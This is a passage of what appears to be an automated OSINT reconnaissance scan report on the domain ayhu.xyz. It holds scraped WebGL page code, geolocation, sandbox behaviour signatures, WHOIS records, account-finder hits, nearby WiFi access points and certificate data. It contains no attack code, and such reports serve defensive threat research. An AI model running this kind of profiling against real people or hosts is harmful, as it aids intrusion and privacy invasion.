formatRGBA = getSupportedFormat(gl, gl.RGBA, gl.RGBA, halfFloatTexType);
formatRG = getSupportedFormat(gl, gl.RGBA, gl.RGBA, halfFloatTexType);
formatR = getSupportedFormat(gl, gl.RGBA, gl.RGBA, halfFloatTexType);
}
return {
gl,
ext: {
formatRGBA,
formatRG,
formatR,
halfFloatTexType,
supportLinearFiltering
}
};
}
function getSupportedFormat (gl, internalFormat, format, type)
{
if (!supportRenderTextureFormat(gl, internalFormat, format, type))
{
switch (internalFormat)
{
case gl.R16F:
return getSupportedFormat(gl, gl.RG16F, gl.RG, type);
case gl.RG16F:
return getSupportedFormat(gl, gl.RGBA16F, gl.RGBA, type);
default:
return null;
}
}
return {
internalFormat,
format
}
}
function supportRenderTextureFormat (gl, internalFormat, format, type) {
let texture = gl.createTexture();
gl.bindTexture(gl.TEXTURE_2D, texture);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_WRAP_S, gl.CLAMP_TO_EDGE);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_WRAP_T, gl.CLAMP_TO_EDGE);
gl.texImage2D(gl.TEXTURE_2D, 0, internalFormat, 4, 4, 0, format, type, null);
let fbo = gl.createFramebuffer();
gl.bindFramebuffer(gl.FRAMEBUFFER, fbo);
gl.framebufferTexture2D(gl.FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.TEXTURE_2D, texture, 0);
const status = gl.checkFramebufferStatus(gl.FRAMEBUFFER);
return status == gl.FRAMEBUFFER_COMPLETE;
}
function startGUI () {
return;
var gui = new dat.GUI({ width: 300 });
gui.add(config, 'DYE_RESOLUTION', { 'high': 1024, 'medium': 512, 'low': 256, 'very low': 128 }).name('quality').onFinishChange(initFramebuffers);
gui.add(config, 'SIM_RESOLUTION', { '32': 32, '64': 64, '128': 128, '256': 256 }).name('sim resolution').onFinishChange(initFramebuffers);
gui.add(config, 'DENSITY_DISSIPATION', 0, 4.0).name('density diffusion');
gui.add(config, 'VELOCITY_DISSIPATION', 0, 4.0).name('velocity diffusion');
gui.add(config, 'PRESSURE', 0.0, 1.0).name('pressure');
gui.add(config, 'CURL', 0, 50).name('vorticity').step(1);
gui.add(config, 'SPLAT_RADIUS', 0.01, 1.0).name('splat radius');
gui.add(config, 'SHADING').name('shading').onFinishChange(updateKeywords);
gui.add(config, 'COLORFUL').name('colorful');
gui.add(config, 'PAUSED').name('paused').listen();
gui.add({ fun: () => {
splatStack.push(parseInt(Math.random() * 20) + 5);
} }, 'fun').name('Random splats');
let bloomFolder = gui.addFolder('Bloom');
bloomFolder.add(config, 'BLOOM').name('enabled').onFinishChange(updateKeywords);
bloomFolder.add(config, 'BLOOM_INTENSITY', 0.1, 2.0).name('intensity');
bloomFolder.add(config, 'BLOOM_THRESHOLD', 0.0, 1.0).name('threshold');
let sunraysFolder = gui.addFolder('Sunrays');
sunraysFolder.add(config, 'SUNRAYS').name('enabled').onFinishChange(updateKeywords);
sunraysFolder.add(config, 'SUNRAYS_WEIGHT', 0.3, 1.0).name('weight');
let captureFolder = gui.addFolder('Capture');
captureFolder.addColor(config, 'BACK_COLOR').name('background color');
captureFolder.add(config, 'TRANSPARENT').name('transparent');
captureFolder.add({ fun: captureScreenshot }, 'fun').name('take screenshot');
let github = gui.add({ fun : () => {
window.open('https://github.com/PavelDoGreat/WebGL-Fluid-Simulation');
} }, 'fun').name('Github');
github.__li.className = 'cr function bigFont';
github.__li.style.borderLeft = '3px solid #8C8C8C';
let githubIcon = document.createElement('span');
github.domElement.parentElement.appendChild(githubIcon);
githubIcon.className = 'icon github';
let twitter = gui.add({ fun : () => {
window.open('https://twitter.com/PavelDoGreat');
} }, 'fun').name('Twitter');
twitter.__li.className = 'cr function bigFont';
twitter.__li.style.borderLeft = '3px solid #8C8C8C';
let twitterIcon = document.createElement('span');
twitter.domElement.parentElement.appendChild(twitterIcon);
twitterIcon.className = 'icon twitter';
let discord = gui.add({ fun : () => {
window.open('https://discordapp.com/invite/CeqZDDE');
} }, 'fun').name('Discord');
discord.__li.className = 'cr function bigFont';
discord.__li.style.bor | https://oldfluid.battleb0t.xyz/./script.js |
| 2023-05-12 02:45:54 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 4 | 0 | None | {u'city': u'Ashburn', u'security': {u'is_vpn': False}, u'city_geoname_id': 4744870, u'region_geoname_id': 6254928, u'country': u'United States', u'region': u'Virginia', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'AMAZON-AES', u'isp_name': u'Amazon.com, Inc.', u'organization_name': u'Amazon Technologies Inc', u'autonomous_system_number': 14618}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'20149', u'longitude': -77.4903, u'country_code': u'US', u'timezone': {u'abbreviation': u'EDT', u'gmt_offset': -4, u'is_dst': True, u'name': u'America/New_York', u'current_time': u'22:45:53'}, u'latitude': 39.0469, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2600:1f18:2489:8200::c8', u'continent': u'North America', u'region_iso_code': u'VA'} | 2600:1f18:2489:8200::c8 |
| 2023-05-12 02:59:50 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | asdf1234@calendar.google.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://privaterelay.appleid.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://url6314.mail.nmacc.com/ls/click?upn=8UUcZfoU9ErRYP5rNGtgbirLN8xfc6bsTdjhpYE9O-2B6oIJCVLBVNxEMl4-2FlyZEXgpIcvOIsLdFwMmNMQ6pyipe-2BlH6ndePI6TegprE8-2FJ5TmwBSGqtoSQiQZMd1uQY0F6EMbvgZh-2FB54nRmur1hYZXb9DpD9Uaqar8AQBxXE9ZjEMEh9pj-2FNvjiSungY8Q-2BcGAEny7iKKiiOMOE4TVnhf8f7XNNG4vkRAhHBxDpFamm0IUZWV3z-2BlJLtiqNZocaeHRbn9q5OE4HMTBuJibaMxdHmJJ9cRGPg-2BIJz-2B-2F91yqQCKhq-2FDCeLChTKA7jVwK1Ouq-2FKIU-2FYhbkgDECGCTTIYKgHXPh2b3OYH9i7a6eI-2FAKkoa5wVpo9vtL32nYWta9ahz5vfUQqJE7rCOt9gGu6vQWShZJVtaDn-2FX0jLeh5IgiUHxe3oW8VqyzM8ypTZLDWj1E59I1JQ-2FktSv0rVnoCoiAb7P30xuBJWLqQ5lH4zPSwzQWh3Y6TkFHvj3cGgCyLHEq7_-2BOt3qy6nPPD-2BvPBT7bVtLrj9wxQ6PC4uiKPO00-2BGDcq4vCUL9jBCG2rzUktFCBBsWM9VDFDukFJsAvP5a2wlNm-2B1xvIYADajgidXgITH2clnmESRV-2BBkImikTYnjRiXwX9u5aj8UOixtxqSLd-2FknigE7ztnUTNb3Hm824FaNuRAjgM7w7tvQQ-2FLlxjpwO7cilXlMlvOUXGvEp4LRn9miTC4WQr-2FP80gqygKVr2Fvg-2F0JMdrNJ9JhF-2BavQqh-2F-2FWWK6tHbATUsKwjMalzZjASsgacGT9IwTW20bAz3NvT70G-2Be6bq15tVuvaeOKAiaoD-2B-2BGHYAAjoEMPIehIdac8BFr1v89Rh5h21H4kub2usLmqC3yC76UJPWE-2FAg-2FkbKljLX7rc5p70-2BTWNNS0fqLYZDnQPX9DQ4opuM2QB21j2WThAg-2Fa6lCRxasFq-2FKDHL-2BKRb', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n 
"\\Sessions\\1\\BaseNamedObjects\\IsoScope_a1c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_a1c_IESQMMUTEX_0_519"\n "IsoScope_a1c_IESQMMUTEX_0_303"\n "IsoScope_a1c_ConnHashTable<2588>_HashTable_Mutex"\n "IsoScope_a1c_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2588"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_a1c_IE_EarlyTabStart_0x9e8_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"167.89.115.56:80"\n "108.139.1.6:443"\n "116.50.97.93:443"\n "185.199.111.153:443"\n "142.251.46.174:443"\n "172.217.12.106:443"\n "18.155.181.57:443"\n "172.217.12.104:443"\n "142.250.191.42:443"\n "157.240.22.25:443"\n "142.251.214.130:443"\n "142.250.191.78:443"\n "142.250.191.66:443"\n "116.50.93.136:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"url6314.mail.nmacc.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"nmacc.com"\n "pchen66.github.io"\n "tickets.jioworldcentre.com"\n "url6314.mail.nmacc.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"":signuphost:":"https://plus.google.com",ratingbadge:{url:"https://www.google.com/shopping/customerreviews/badge?usegapi=1"},appcirclepicker:{url:":socialhost:/:session_prefix:_/widget/render/appcirclepicker"},follow:{url:":socialhost:/:session_prefix:_/widget/render/follow?usegapi=1"},community:{url:":ctx_socialhost:/:session_prefix::im_prefix:_/widget/render/community?usegapi=1"},sharetoclassroom:{url:"https://classroom.google.com/sharewidget?usegapi=1"},ytshare:{params:{url:""},url:":socialhost:/:session_prefix:_/widget/render/ytshare?usegapi=1"}," (Indicator: "plus.google.com")\n "* [http://developers.facebook.com/policy/]. 
This copyright notice shall be" (Indicator: "facebook.com")\n "b,"vert.pix");break;case "PERCENT":Fy(d.verticalThresholds,b,"vert.pct")}Ev("sdl","init",!1)?Ev("sdl","pending",!1)||J(function(){return Gy()}):(Cv("sdl","init",!0),Cv("sdl","pending",!0),J(function(){Gy();if(Hy()){var e=Iy();qc(z,"scroll",e);qc(z,"resize",e)}else Cv("sdl","init",!1)}));return b}My.M="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),Ny=["www.youtube.com","www.youtube-nocookie.com"],Oy,Py=!1;" (Indicator: "youtube")\n "disableRealtimeCallback:!1,drive_share:{skipInitCommand:!0},csi:{rate:.01},client:{cors:!1},signInDeprecation:{rate:0},include_granted_scopes:!0,llang:"en",iframes:{youtube:{params:{location:["search","hash"]},url:":socialhost:/:session_prefix:_/widget/render/youtube?usegapi=1",methods:["scroll","openwindow"]},ytsubscribe:{url:"https://www.youtube.com/subscribe_embed?usegapi=1"},plus_circle:{params:{url:""},url:":socialhost:/:session_prefix::se:_/widget/plus/circle?usegapi=1"},plus_share:{params:{url:""}," (Indicator: "youtube")\n "function My(a,b){var c=this;return b}My.M="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),Ny=["www.youtube.com","www.youtube-nocookie.com"],Oy,Py=!1;" (Indicator: "youtube")\n "l=!!a.get("fixMissingApi");if(!(d||e||f||g.length||h.length))return;var n={Gf:d,Ef:e,Ff:f,lg:g,mg:h,gd:l,Xa:b},p=z.YT,q=function(){Vy(n)};if(p)return p.ready&&p.ready(q),b;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};J(function(){for(var t=H.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(Yy(w,"iframe_api")||Yy(w,"player_api"))return b}for(var x=H.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!Py&&Wy(x[A],n.gd))return mc("https://www.youtube.com/iframe_api")," (Indicator: "youtube")\n 
"person:{url:":socialhost:/:session_prefix:_/widget/render/person?usegapi=1"},savetodrive:{url:"https://drive.google.com/savetodrivebutton?usegapi=1",methods:["save"]},page:{url:":socialhost:/:session_prefix:_/widget/render/page?usegapi=1"},card:{url:":socialhost:/:session_prefix:_/hovercard/card"}}},h:"m;/_/scs/abc-static/_/js/k=gapi.lb.en.zUi2Oiqh0cQ.O/d=1/rs=AHpOoo-VnflFHGTzk3OsaVpWbqz0Ysb2Jw/m=__features__",u:"https://apis.google.com/js/api.js",hee:!0,dpo:!1,le:["scs"],glrp:false},platform:"backdrop blogger comments commentcount community donation family_creation follow hangout health page partnersbadge person playemm playreview plus plusone post ratingbadge savetoandroidpay savetodrive savetowallet sharetoclassroom shortlists signin2 surveyoptin visibility youtube ytsubscribe zoomableimage".split(" ")," (Indicator: "youtube")\n "Py=!0,b});return b}Zy.M="internal.enableAutoEventOnYouTubeActivity";var $y;function az(a){var b=!1;return b}az.M="internal.evaluateMatchingRules";" (Indicator: "youtube")\n "transportUrl:b,context:c},R(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Hh.ia+"&cx=c";hs()&&(f+="&sign="+Hh.se);var g=Qh||Zh?gs(b,f):void 0;g||(g=So("https://","http://",Hh.Gd+f));Cl().destination[a]={state:1,context:c};mc(g)}};function is(){if(xl()){return!0}return!1};var ls=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),ms={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},ns={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")\n "var Yv=function(a,b,c){function d(){var g=a();f+=e?(Ua()-e)*g.playbackRate/1E3:0;e=Ua()}var e=0,f=0;return{createEvent:function(g,h,l){var 
n=a(),p=n.Lf,q=void 0!==l?Math.round(l):void 0!==h?Math.round(n.Lf*h):Math.round(n.Uh),r=void 0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100),t=H.hidden?!1:.5<=Hk(c);d();var u=void 0;void 0!==b&&(u=[b]);var v=Av(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "main.4a45304c_1_.js" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "api_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "QA70RK48.txt" has type "ASCII text"- Location: [%APPDATA%\\Mic |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 1 | 2 | 0 | None | 220-cp.keyubu.net ESMTP Exim 4.95 #2 Thu, 11 May 2023 06:41:45 +0300<br>220-We do not authorize the use of this system to transport unsolicited,<br>220 and/or bulk e-mail. | 87.248.157.102 |
| 2023-05-12 03:31:23 | Malicious IP on Same Subnet | Yes | blocklist.de | 0 | 0 | 4 | 0 | None | blocklist.de List [207.154.224.0/20]<br>http://lists.blocklist.de/lists/all.txt | 207.154.224.0/20 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.211): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5acc457cc32d9a-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.97.1 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | SpiceWorks (Category: tech)<br>https://community.spiceworks.com/people/ayhu | ayhu |
| 2023-05-12 03:00:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.7): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-origin-cache: HIT | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 02:54:10 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c570c285af722f3-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:10:14 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 4 | 0 | None | VOIPBL Publicly Accessible PBX List [172.67.160.0/20]<br>http://www.voipbl.org/update | 172.67.160.0/20 |
| 2023-05-12 02:54:41 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 396982 | 104.196.30.220 |
| 2023-05-12 02:45:43 | Physical Location | No | AbstractAPI | 1 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 185.199.109.153 |
| 2023-05-12 03:09:26 | Co-Hosted Site - Domain Whois | No | Whois | 2 | 0 | 4 | 0 | None | Domain Name: 001VIET.COM
Registry Domain ID: 2685910837_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2022-10-01T07:27:47Z
Creation Date: 2022-03-31T20:18:54Z
Registry Expiry Date: 2024-03-31T20:18:54Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 480-624-2505
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: NS35.DOMAINCONTROL.COM
Name Server: NS36.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:09:05Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: 001viet.com
Registry Domain ID: 2685910837_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-03-31T15:18:54Z
Creation Date: 2022-03-31T15:18:54Z
Registrar Registration Expiration Date: 2024-03-31T15:18:54Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Registry Admin ID: Not Available From Registry
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Name Server: NS35.DOMAINCONTROL.COM
Name Server: NS36.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:09:26Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
| 001viet.com |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Pastebin (Category: tech)
https://pastebin.com/u/login | login |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <hidden ssid> (Net ID: 00:01:E3:55:9A:D5) | 52.3759, 4.8975 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | JIVE2.42025B0 (Net ID: 00:01:9F:20:25:B0) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:03:17 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:18:ae:06:7e:fc:0b:78:46:5c:8b:fe:1a:31:bf:5b:16:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 17:51:43 2022 GMT
Not After : Mar 13 17:51:42 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
46:DD:F2:80:57:6C:FD:50:6F:F3:DF:3E:F6:D6:F8:E4:B9:2D:C4:6F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
